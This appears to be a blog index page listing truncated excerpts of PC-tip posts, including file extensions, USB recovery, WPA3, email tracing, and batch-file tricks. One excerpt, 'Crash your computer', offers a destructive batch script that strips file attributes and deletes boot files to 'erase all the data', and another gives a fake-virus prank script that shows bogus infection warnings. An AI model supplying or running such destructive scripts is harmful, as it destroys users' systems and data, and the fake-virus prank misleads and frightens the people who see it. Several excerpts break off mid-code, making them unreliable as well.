List of PC file Extensions

List of PC file Extensions This is a list of the most commonly found extensions, what type of file they are and what program if any they are associated with.   .$$$ Temporary file   .$$A OS/2 program file   .$$F OS/2 database file   .$$S OS/2 spreadsheet file   . OS/2 planner file  

How To Recover From Corrupted USB

How To Recover From Corrupted USB  If your computer fails to recognize your hard drive, then you can try assigning a new drive letter to your storage media. This method will work wonderfully, and you will not need any third party tool to recover the files. Here’s how you can assign a new drive letter.

WPA3 security is ready

WiFi security is finally getting an upgrade after 14 years. the next-generation standard that promises to tackle many of the vulnerabilities that have persisted in wireless networking. Most notably, it brings individualized data encryption that should protect your data against eavesdropping from within the WiFi network. If you’re using professional-grade WPA3-Enterprise security, you’ll get the “equivalent” to 192-bit

How to close ports in windows

Close the port in windows machine In this post i am show the code from the how to close the ports in windows from the vbs script and batch file programming . In the below post you can try at your own risk and enjoy programming . —–> VBS Script  set ss = createobject(“”) set

Crash your computer

Hello , In this tutorials i am teach you how to crash computer and erase all the data . 1 ) Open Notepad and copy-paste this code . 2 ) Below the code you have copy . @echo off attrib -r -s -h c:\autoexec.bat del c:\autoexec.bat attrib -r -s -h c:\boot.ini del c:\boot.ini attrib -r

amazing website

Hi friends , In this post I am find 5 interesting websites in google . I am share with you from this website you should check this website . this website is very interesting and amazing . 1-     Internet Map : 2-     Scale of the Universe :               this website

trace email

How to trace an Email : Tracing an Email means locating the Original Sender and Getting to know the IP address of the network from which the Email was actually generated. To get the information about the sender of the Email we first must know the structure of the Email. As we all know the

Blue Screen of Death Using Notepad

How To Make A Full Screen Fake Virus w_ Blue Screen of Death Using Notepad Just copy below command in notepad and save it ad bat extension @echo off echo ———————————————————————- echo WARNING! A VIRUS HAS BEEN DETECTED ON YOUR COMPUTER! pause echo FILE RECOGNIZED AS SISDPYGnfg32.bat pause echo CONTACTING ANTIVIRUS… pause echo WOULD YOU